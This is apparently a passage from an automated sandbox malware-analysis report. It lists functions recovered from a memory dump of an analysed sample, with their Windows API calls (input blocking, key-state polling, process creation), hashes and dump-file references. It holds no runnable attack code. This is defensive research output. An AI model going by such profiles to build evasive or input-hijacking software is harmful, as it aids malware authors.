                                                                                                                                • Opcode ID: 4f797a8945fb36fd52c5a3ed380ea41041bd4a13b9da5659213085d5f2f84d87
                                                                                                                                • Instruction ID: 3bea8141222eda475972aa4767c9c2ad10e3dd40e89141c7f1050bae06c8ac3a
                                                                                                                                • Opcode Fuzzy Hash: 4f797a8945fb36fd52c5a3ed380ea41041bd4a13b9da5659213085d5f2f84d87
                                                                                                                                • Instruction Fuzzy Hash: 95E08C3110421DBBEB140F09DC0AFB93B18EB00B60F248527F91A880E0D7B088A0E660
                                                                                                                                Function 00F38E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,00F1125D,00F37A43,00F10F35,?,?,00000001), ref: 00F38E41
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F38E4A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: ea78be93896c1f3fa3939ae61639dc7ff1bc94bca7794d3cd9db188cff4ba418
                                                                                                                                • Instruction ID: 0407695b90d63d9d3bda97afcd386d2c3b3cf950d37d95dbd852ad070b3df2f4
                                                                                                                                • Opcode Fuzzy Hash: ea78be93896c1f3fa3939ae61639dc7ff1bc94bca7794d3cd9db188cff4ba418
                                                                                                                                • Instruction Fuzzy Hash: BAB09271044A0CABEA002BB1EC09F883F68EB08A63F104012F61D440608B635450AA92
                                                                                                                                Function 00F4113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f4f5de7bc3a2743bda3d36fb46fa1971c43556a3d37e2cc5d40df586b08d505f
                                                                                                                                • Instruction ID: 1c5362e56075d5b9965230088a106db6355c8c3db49bbf2afd6f2c1c9979ed30
                                                                                                                                • Opcode Fuzzy Hash: f4f5de7bc3a2743bda3d36fb46fa1971c43556a3d37e2cc5d40df586b08d505f
                                                                                                                                • Instruction Fuzzy Hash: 46B11260D2AF454DD72396398831336BB5CAFBB6C5F92D71BFC2A74D22EB2181835180
                                                                                                                                Function 00F802AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00F80352
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2065330234-0
                                                                                                                                • Opcode ID: b10cd2a3f8536f9fa8274b454caf9e0b97cd8157d4f14f316593f2986ae09448
                                                                                                                                • Instruction ID: 97dcb4234487b8a4ba883b212ee879b281dfd2e3e449a4f309529bd116fc9c83
                                                                                                                                • Opcode Fuzzy Hash: b10cd2a3f8536f9fa8274b454caf9e0b97cd8157d4f14f316593f2986ae09448
                                                                                                                                • Instruction Fuzzy Hash: AD115732244259BBFB256B288C09FF93715EB01760FA48316F9215A1E2CEA44D05F365
                                                                                                                                Function 00F7E769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2B155: GetWindowLongW.USER32(?,000000EB), ref: 00F2B166
                                                                                                                                • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00F7E7AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallLongProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4084987330-0
                                                                                                                                • Opcode ID: 883ff5351404a20359a8321959be15a2e8b3ff8964c95556fe31a39bd258d19e
                                                                                                                                • Instruction ID: 1c3a78306c22d579d06019e4749c42bf7b8f3fad3f0720a2ccbe95cb97549d57
                                                                                                                                • Opcode Fuzzy Hash: 883ff5351404a20359a8321959be15a2e8b3ff8964c95556fe31a39bd258d19e
                                                                                                                                • Instruction Fuzzy Hash: EDF03C3210010CBFCF09DF54EC409793BAAFB08320B048556FD298A2A1C7329D71FB51
                                                                                                                                Function 00F7EA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                  • Part of subcall function 00F2B736: GetCursorPos.USER32(000000FF), ref: 00F2B749
                                                                                                                                  • Part of subcall function 00F2B736: ScreenToClient.USER32(00000000,000000FF), ref: 00F2B766
                                                                                                                                  • Part of subcall function 00F2B736: GetAsyncKeyState.USER32(00000001), ref: 00F2B78B
                                                                                                                                  • Part of subcall function 00F2B736: GetAsyncKeyState.USER32(00000002), ref: 00F2B799
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00F8F417,?,?,?,?,?,00000001,?), ref: 00F7EA9C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2356834413-0
                                                                                                                                • Opcode ID: ea05d9f733052bba08de47c772723383028f31739c921b0c4fd4805f5617c5f7
                                                                                                                                • Instruction ID: 2bcb074fb6f130e5b77fdb6defbdef147ce0da42dbdcd20ae4d9872dadb2e5aa
                                                                                                                                • Opcode Fuzzy Hash: ea05d9f733052bba08de47c772723383028f31739c921b0c4fd4805f5617c5f7
                                                                                                                                • Instruction Fuzzy Hash: D9F0A731100229BBDB14AF19DC05EBA3F65FB04750F044016F90A5A191D77A9861FBD1
                                                                                                                                Function 00F2B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00F2AF40,?,?,?,?,?), ref: 00F2B83B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2065330234-0
                                                                                                                                • Opcode ID: 1a1d1d766dc3c0c18be2a6f172b038636e3ab0f46126d27b8b92ce485b4a3e1b
                                                                                                                                • Instruction ID: 2591fe4a997a8a64c1fa025d992fdacef7cc6f01494ecaec27720c8affe3a552
                                                                                                                                • Opcode Fuzzy Hash: 1a1d1d766dc3c0c18be2a6f172b038636e3ab0f46126d27b8b92ce485b4a3e1b
                                                                                                                                • Instruction Fuzzy Hash: 7CF05E31600219AFDB18EF64DC91A753BA6FB05360F14422AF9528B2A1D771D851FB50
                                                                                                                                Function 00F6703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • BlockInput.USER32(00000001), ref: 00F67057
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BlockInput
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                • Opcode ID: b438878bee7cd04e00ffd5dc804121387a354299445b58cf4efddad49ee26282
                                                                                                                                • Instruction ID: aaa28a7306d153fb393f606566f779bd1f3370a84a87bff70ad0d5a75d53501a
                                                                                                                                • Opcode Fuzzy Hash: b438878bee7cd04e00ffd5dc804121387a354299445b58cf4efddad49ee26282
                                                                                                                                • Instruction Fuzzy Hash: F6E048362042146FD710EF69D805E96F7EC9F54750F00C427F945D7251DAB4E840ABA0
                                                                                                                                Function 00F7F3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00F7F41A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3239928679-0
                                                                                                                                • Opcode ID: d95b7e6ef90464991efd4f18a3ac8cbd417bbfdab85cc6406309816d59fcdeee
                                                                                                                                • Instruction ID: e27a6e89ed1aec02bbaa0e9a16966e4b93a6e29d7ba767928d275a5dc96d0f83
                                                                                                                                • Opcode Fuzzy Hash: d95b7e6ef90464991efd4f18a3ac8cbd417bbfdab85cc6406309816d59fcdeee
                                                                                                                                • Instruction Fuzzy Hash: 8DF06D32641289BFDB21DF58DC09FC63B96FB05360F18845ABA15672E1CB706820F765
                                                                                                                                Function 00F2AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00F2ACC7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogLongNtdllProc_Window
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2065330234-0
                                                                                                                                • Opcode ID: 7e3ece0894b209e58bc603f5dab8e3405b3546178b129cadfbb76c5186c939a1
                                                                                                                                • Instruction ID: e13f9ea3f869cf652bc38bbbc4ed56eff8a91b0c48fda32aa6c1a72ae0eb6dac
                                                                                                                                • Opcode Fuzzy Hash: 7e3ece0894b209e58bc603f5dab8e3405b3546178b129cadfbb76c5186c939a1
                                                                                                                                • Instruction Fuzzy Hash: 24E0EC36640208FBCF05AFA0DC51E643B26FB49354F148419F6154A2A1CA36A522FB51
                                                                                                                                Function 00F7F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00F8F3D4,?,?,?,?,?,?), ref: 00F7F450
                                                                                                                                  • Part of subcall function 00F7E13E: _memset.LIBCMT ref: 00F7E14D
                                                                                                                                  • Part of subcall function 00F7E13E: _memset.LIBCMT ref: 00F7E15C
                                                                                                                                  • Part of subcall function 00F7E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FD3EE0,00FD3F24), ref: 00F7E18B
                                                                                                                                  • Part of subcall function 00F7E13E: CloseHandle.KERNEL32 ref: 00F7E19D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2364484715-0
                                                                                                                                • Opcode ID: 2e23d8b6a10f834aecd72c5cdeeeb1aa47e937a4edabbe728b20c2c94f1769ed
                                                                                                                                • Instruction ID: 00c2c686cc40da0552a59427dcdadfeded83d6a10e582e703d2cca6d0e5b1ab1
                                                                                                                                • Opcode Fuzzy Hash: 2e23d8b6a10f834aecd72c5cdeeeb1aa47e937a4edabbe728b20c2c94f1769ed
                                                                                                                                • Instruction Fuzzy Hash: 1EE04632100208EFCB01EF58DC05E9637A2FB08350F018056FA08572B1C731A820FF42
                                                                                                                                Function 00F7F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtdllDialogWndProc_W.NTDLL ref: 00F7F3D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3239928679-0
                                                                                                                                • Opcode ID: 6fbbb772cf7171d6496a8b0937415e59fbce99b5d0a6c0fd42fc4a6757c9430f
                                                                                                                                • Instruction ID: 50aa8d3cf63ac04ad460ab033b2681026c404f5c7b04afc94512f7f015b1dcdb
                                                                                                                                • Opcode Fuzzy Hash: 6fbbb772cf7171d6496a8b0937415e59fbce99b5d0a6c0fd42fc4a6757c9430f
                                                                                                                                • Instruction Fuzzy Hash: 10E0173424024CEFCB01DF98D844E863BA5FB1A350F050055FD048B362C772A830EBA1
                                                                                                                                Function 00F7F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtdllDialogWndProc_W.NTDLL ref: 00F7F3A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DialogNtdllProc_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3239928679-0
                                                                                                                                • Opcode ID: eae7c52ff4b678e9a5536e309ba0ed84541bc7ae97ce8aad71a89d76c5955658
                                                                                                                                • Instruction ID: f38780aa7fa4d791de8d53f9137620701a8e9e19ce2da8b6223498df58ca5a42
                                                                                                                                • Opcode Fuzzy Hash: eae7c52ff4b678e9a5536e309ba0ed84541bc7ae97ce8aad71a89d76c5955658
                                                                                                                                • Instruction Fuzzy Hash: 2AE0173424424CEFCB01DF98DC44E863BA5FB1A350F050055FD048B361C771A830EB61
                                                                                                                                Function 00F2B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00F2AF8E
                                                                                                                                  • Part of subcall function 00F2B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F2B85B), ref: 00F2B926
                                                                                                                                  • Part of subcall function 00F2B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00F2B85B,00000000,?,?,00F2AF1E,?,?), ref: 00F2B9BD
                                                                                                                                • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00F2AF1E,?,?), ref: 00F2B864
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2797419724-0
                                                                                                                                • Opcode ID: 91f748fb01859df8780a6d9960231bc4e5acb3b548f452609de9d44c21f954c9
                                                                                                                                • Instruction ID: 1bc6920ad23402f02a7850dd1eede1dde2581a0e8641850b4db51259f99a5551
                                                                                                                                • Opcode Fuzzy Hash: 91f748fb01859df8780a6d9960231bc4e5acb3b548f452609de9d44c21f954c9
                                                                                                                                • Instruction Fuzzy Hash: B2D0127214430C77DB106BA1ED07F493A1EAB00750F548421FA05691E28A75A451B555
                                                                                                                                Function 00F38E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F38E1F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
